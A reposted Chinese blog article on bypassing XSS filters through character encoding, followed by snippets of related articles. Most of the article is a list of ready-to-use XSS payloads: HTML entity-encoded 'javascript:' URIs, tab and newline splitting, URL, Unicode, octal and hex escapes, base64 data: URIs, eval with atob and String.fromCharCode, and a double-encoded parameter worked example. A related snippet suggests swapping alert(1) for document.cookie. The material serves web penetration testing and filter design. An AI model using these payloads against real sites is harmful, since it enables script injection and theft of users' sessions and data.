【应用安全——XSS】字符编码绕过

最新推荐文章于 2025-04-24 11:36:52 发布
转载 最新推荐文章于 2025-04-24 11:36:52 发布 · 5.1k 阅读 · 16

本文深入探讨了XSS攻击的各种技巧,包括如何利用不同的编码方式绕过常见的安全过滤,如十进制、十六进制编码,URL编码,以及JavaScript和Unicode编码等。同时,还介绍了如何在特定环境下利用DOM、事件处理程序和协议头进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

编码转换工具:

http://bianma.51240.com/

html实体编码

<iframe src=javascript:alert(1)>

html标签中支持十进制,例如:

<iframe src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>

十六进制,例如:

<iframe src=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;>

可以不带分号

<iframe src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x31&#x29>

可以填充0

<iframe src=&#x0006A&#x00061&#x00076&#x00061&#x00073&#x00063&#x00072&#x00069&#x00070&#x00074&#x0003A&#x00061&#x0006C&#x00065&#x00072&#x00074&#x00028&#x00031&#x00029>

绕过关键字过滤

<iframe src=javas&#x09;cript:alert(1)></iframe> //Tab

<iframe src=javas&#x0A;cript:alert(1)></iframe> //回车

<iframe src=javas&#x0D;cript:alert(1)></iframe> //换行

<iframe src=javascript&#x003a;alert(1)></iframe> //编码冒号

<iframe src=javasc&NewLine;ript&colon;alert(1)></iframe> //HTML5 新增的实体命名编码,IE6、7下不支持

URL编码

<a href="{here}">xx</a>

<iframe src="{here}">

当输出环境在href或者src时,是可以通过javascript伪协议来执行JS的,例如<iframe src=”javascript:alert(1)”>test</iframe>

同样src中是可以进行URL编码的,需要注意协议头javascript:不能编码,否则JS无法执行。

<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>

<a href="javascript:%61%6c%65%72%74%28%31%29">xx</a>

这里结合一下上面说16进制编码

<iframe src="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;%61%6c%65%72%74%28%31%29"></iframe>

javascript编码

<script>alert(1)</script>

Unicode编码<script>\u0061\u006C\u0065\u0072\u0074(1)</script>

Javascript解析器工作的时候将\u0061\u006c\u0065\u0072\u0074进行js解码后为”alert”,但是需要注意像圆括号、双引号、单引号不能编码,否则在这种场景下无法弹窗。

例如<script>\u0061\u006C\u0065\u0072\u0074(‘1\u0027)</script>这种是无法执行的。

测试一下DOM的环境,测试代码如下:

<div id='s'>test</div>

<script>

var s = "<img/src=x onerror=alert(1)>";

document.getElementById('s').innerHTML = s;

</script>

<img/src=x οnerrοr=alert(1)>的以下编码都可以弹窗:

Unicode: \u003C\u0069\u006D\u0067\u002F\u0073\u0072\u0063\u003D\u0078\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E

八进制: \074\151\155\147\057\163\162\143\075\170\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076

十六进制: \x3C\x69\x6D\x67\x2F\x73\x72\x63\x3D\x78\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E

在JS事件中使用Location跳转也可以,例如。

<input onfocus=location="javascript:alert\u00281\u0029" autofocus>

DATA协议(IE不支持)

<a href="{here}">xx</a>

<iframe src="{here}">

例如

<a href="data:text/html;base64, PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">test</a>

<iframe src="data:text/html;base64, PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></iframe>

需要注意内容是可以做实体编码。不影响XSS执行。

<iframe src="data:text/html,&lt;script&gt;alert&#40;1&#41;&lt;/script&gt;"></iframe>

<iframe srcdoc="&lt;script&gt;alert&#40;1&#41;&lt;/script&gt;"></iframe>

Eval

atob:

<a href=javascript:eval(atob('YWxlcnQoMSk='))>Click</a> //需要引入单引号或双引号

String.fromCharCode:

<a href='javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))'>Click</a>

案例:

参数输出环境:

测试发现参数这里过滤”和(,无法输入”就无法闭合,发现该参数的输出环境在src中,那么通过javascript伪协议就可以执行JS,但是因为无法引入(,所以需要进行编码才可以。

1)10进制和16进制编码绕过

HTML标签中是支持10进制和16进制编码的,那么先将javascript:alert(1)做10进制编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;;//

因为参数值中有&和#,需要一次URL编码

%26%23106%3b%26%2397%3b%26%23118%3b%26%2397%3b%26%23115%3b%26%2399%3b%26%23114%3b%26%23105%3b%26%23112%3b%26%23116%3b%26%2358%3b%26%2397%3b%26%23108%3b%26%23101%3b%26%23114%3b%26%23116%3b%26%2340%3b%26%2349%3b%26%2341%3b;//

2)URL编码绕过

SRC标签中是支持解码的,也就是我可以对过滤字符做二次URL编码绕过

参考文章:

http://su.xmd5.org/static/drops/tips-689.html

https://security.yirendai.com/news/share/26

xss编码绕过详解(更像是在介绍实体编码和JS编码的解析过程)
qq_41631096的博客
03-09 4590
xss编码绕过详解(更像是在介绍实体编码和JS编码的解析过程) 注:本文通过研究各种情况下实体编码和JS编码是否生效,进而总结了哪些情况下能够进行编码后,javascript代码依然能够正常执行。 解析顺序是这样的,URL 解析器,HTML 解析器, CSS 解析器,JS解析器 URL的解码是在后台服务检测之前的,可以理解为后台收到URL后会自动进行解码, 然后才是执行开发人员编写的对URL中的值...
第十五天DOM型xss和编码绕过问题
代码审计
03-21 2040
DOM型xss 对象模型(Document Object Model),即大名鼎鼎的DOM。 DOM可以被认为是一种通过将页面元素以对象的树形方式表现,以便由Javascript组织处理的实现方法。 特点2 无需服务器参与 为什么右键查看源代码 无法找到插入的payload 源代码 来源于服务器的返回 而dom型xss无需服务器的参与 所以此时无法修改右键查看的源代码 DOM XSS与反射型XSS和存储型XSS的差别是在于DOM XSS的代码不需要服务器解析响应的直接参与,触发XSS漏洞靠
xss绕过之编码绕过
m0_63581584的博客
06-03 2751
xss编码绕过 首先我们知道解析顺序,URL解码,HTML解码 ,CSS解码,JS解码 1.在服务端接受到请求后,一般是先进行url解码,然后在提取浏览器中参数。所以一般url编码是不能绕过。 2.如果我们输入了带有HTML实体编码值,只要在保证浏览器接受数据时能构建DOM树,就能进行解码操作。 下面为什么会进行url编码,不是为了绕过而进行的,因为HTML实体编码后(&#x63);会是这种情况。而浏览器在发送到服务端传参也是&进行传参分隔的,所以就会产生问题.我们就要进行url编码 3.我
一道有趣的xxe过滤题(html实体化绕过)
最新发布
2303_80867263的博客
04-24 573
经过测试得知过滤了system,file,//,那就找编码绕过,试了下都不行,看了wp才知道要用html实体化,涨知识了。要利用参数实体,在里面整一个实体调用file函数然后查找flag,本题提示了/api/login进入这个接口。然后把括号里面的进行html实体化,看到上面有个xml,试试xml,既然有xml,那就试试xxe,
XSS编码绕过和防御
weixin_50464560的博客
05-07 2万+
第一部分:常用JS测试语句小结 1.0 常用测试语句说明 <script>alert(1)</script>        //这里alert(1)只是为了简单明了,当然可以弹出cookie.把1换成document.cookie即可.<script src=x οnerrοr=alert(1)></script>   //引入x,由于x不存在,触发onerror函数,进行弹框<script src='h
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)
白帽黑客八哥的博客
12-12 1万+
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
XSS编码技巧:绕过Web应用安全防护
weixin_43822401的博客
06-06 923
在Web安全领域,跨站脚本攻击(XSS)是一种常见的攻击手段。攻击者通过在Web页面中注入恶意脚本,可以盗取用户信息、会话令牌或其他敏感数据。随着Web应用安全防护措施的加强,攻击者需要掌握高级的编码技巧来绕过这些防护。本文将详细介绍几种XSS编码技巧,帮助安全专家和开发人员更好地理解和防御XSS攻击。
机器学习实现web攻击检测——XSS、SQL注入、Webshell检测.zip
05-06
在实际应用中,机器学习模型可能会面临对抗性攻击,即攻击者试图误导模型以绕过检测。因此,模型的鲁棒性和持续更新至关重要。定期更新模型以适应新的攻击手段,同时结合规则基础的检测方法,可以提高整体的防护效果...
Web安全原理(2)——XSS
yuluotianjin的博客
09-03 363
1.XSS简介 跨站脚本攻击(Cross-Site Scripting,XSS)是针对网站应用程序的安全漏洞攻击技术,也是一种代码注入技术。攻击者往Web页面里插入恶意Script代码,当其他用户浏览网页触发恶意代码就会遭到攻击。 这里的跨站访问,可以是从正常的网站跨到黑客的服务器,也可以是黑客的服务器跨到正常的网站。 XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以XSS漏洞关键就是寻找参数未过滤的输出函数。 XSS攻击分为三种:反射型、存
防止xss和sql注入:JS特殊字符过滤正则
12-01
有些攻击者可能会使用编码或转义技术绕过这种简单的过滤。为了更全面地防止XSS,应当结合其他防御措施,如使用Content Security Policy (CSP)、输入验证、HTML编码、输出编码等。 对于SQL注入,预防的最佳做法是...
WEB渗透学习笔记6——XSS漏洞
林林木林林L的博客
07-29 619
XSS——跨站脚本漏洞 跨站脚本(Cross-Site Scripting),简称为XSS或CSS或跨站脚本攻击,是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。恶意用户利用XSS代码攻击成功后,可能得到很高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。可以用于钓鱼攻击,挂马,cookie获取,前端js挖矿等攻击行为,而且广泛适用于和其他漏洞结合,达到攻击服务器的目的 防范: 1.对所有不可信的输入数据进
xss编码问题及绕过
qq_43665434的博客
03-13 1595
常用的编码 URL编码: 一个百分号和该字符的ASCII编码所对应的2位十六进制数字。 例如“/”的URL编码为%2F #:%23; . :%2e; + :%2b; < :%3c; >: %3e; !:%21; 空格:%20; &: %26; (:%28; ):...
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧
m0_67844671的博客
10-18 2045
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧;你知道xss如何绕过吗?本篇讲述了一些xss常见的绕过手法及技巧,包括双写,大小写绕过,编码绕过等,过来看看吧
xss绕过
weixin_51692662的博客
08-19 2770
xss绕过
XSS编码问题以及绕过
我不是大牛
07-04 1万+
常用的编码 URL编码:一个百分号和该字符的ASCII编码所对应的2位十六进制数字。 例如“/”的URL编码为%2F # : %23 ; . :%2e ; + :%2b;< :%3c >: %3e ; ! :%21 ; 空格:%20; &: %26; (:%28; ): %29,”:%22,’:%27 常用的编码 HTML实体编码:以&开头,分号结尾的。 例如“<...
XSS编码绕过原理
m0_67348334的博客
02-25 420
浏览器在解析一篇HTML文档时,一般顺序为HTML解析→URL解析→JavaScript解析
【漏洞发现-xss跨站脚本攻击】实体编码绕过
m0_46344990的博客
05-28 3439
一、漏洞描述 xss跨站脚本攻击是黑客通过“html注入”篡改了网页,插入了js恶意脚本,前端渲染时进行恶意代码执行,从而控制用户浏览的一种攻击。经常出现在需要用户输入的地方,一旦对输入不进行处理,就会发生网页被篡改。 分为三类 反射型:经过后端,不经过数据库 存储型:经过后端,经过数据库 DOM型:不经过后端,是基于文档对象型的一种漏洞,dom-xss是通过url参数去控制触发的 xss靶场第八关服务器采用了替换恶意关键字的方式防御,对输入进行小写转化,可以使用实体编码绕过服务器检测,当传回浏
【渗透测试】XSS编码及绕过原理
热门推荐
ssrf
08-06 2万+
一、URL编码 url编码:一个百分号和该字符的ASCII编码所对应的2位十六进制数字。 例如:"/"的url编码位%2F URL 防止sql注入 URL编码平时是用不到的,因为IE会自动将输入到地址栏的非数字字母转换为url编码。曾有人提出数据库名字里带上“#”以防止被下载,因为IE遇到#就会忽略后面的字母。破解方法很简单——用url编码%23替换掉#。现在SQL注射非常流行,所以就有人写了一些防注射的脚本。 URL 编码对照表 URL 编码形式表示的 ASCII 字符(十六进制格式)。 十六进制格式用于
深入讲解XSS利用编码绕过的原理
<XiaoHai>的博客
08-17 2173
xss
xss闭合绕过
03-24
### 关于XSS攻击中闭合标签的绕过技术 跨站脚本攻击(XSS)是一种常见的安全漏洞,允许攻击者注入恶意代码到网页上。为了防止这种攻击,许多现代浏览器和服务器端防护机制会尝试过滤掉潜在危险的内容。然而,一些特定的技术可以用来绕过这些防御措施。 #### 使用HTML实体编码绕过 一种常见的方式是利用HTML实体编码来混淆输入内容。例如,在某些情况下可以通过嵌入转义字符或者特殊编码形式来规避检测器对闭合标签的识别。下面是一个例子: ```html <IMG SRC="jav ascript:alert(&#39;XSS&#39;);"> ``` 这里通过插入十六进制表示的新行符` `打断了JavaScript关键字,从而可能避开简单的正则表达式匹配[^1]。 #### 利用不完整的标签结构 有时不需要完全关闭标签也可以触发事件处理程序。比如只写开标签而省略结束部分可能会让解析引擎仍然执行其中定义的动作: ```html <img src=x onerror=alert(1)> ``` 此片段故意制造了一个错误路径作为图像源地址(`src`),当加载失败时就会调用`onerror`属性指定的行为——即弹窗显示消息框[^3]。 #### 借助Unicode或URL编码隐藏意图 对于那些基于字符串模式匹配的安全规则来说,采用不同的编码方式能够有效掩盖真实的payload含义。像这样把尖括号替换为其对应的数值引用也可能奏效: ```html <script>document.write("Hello World!");</script> ``` 上述代码中的实际意义被转换成了不可见的形式呈现给审查工具,但最终会被渲染成可运行状态下的JS指令集。 另外值得注意的是,针对具体环境定制化的测试非常重要,因为不同框架和技术栈所采取的防范策略各有差异。因此了解目标平台如何实现其保护层将是成功实施此类操作的关键前提条件之一[^2]。 ### 结论 综上所述,尽管存在多种手段可以帮助突破现有的防XSS屏障,但是每种方法都有局限性和适用范围。开发人员应当始终遵循最佳实践原则构建应用程序,并定期更新依赖库版本以减少遭受此类威胁的风险。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值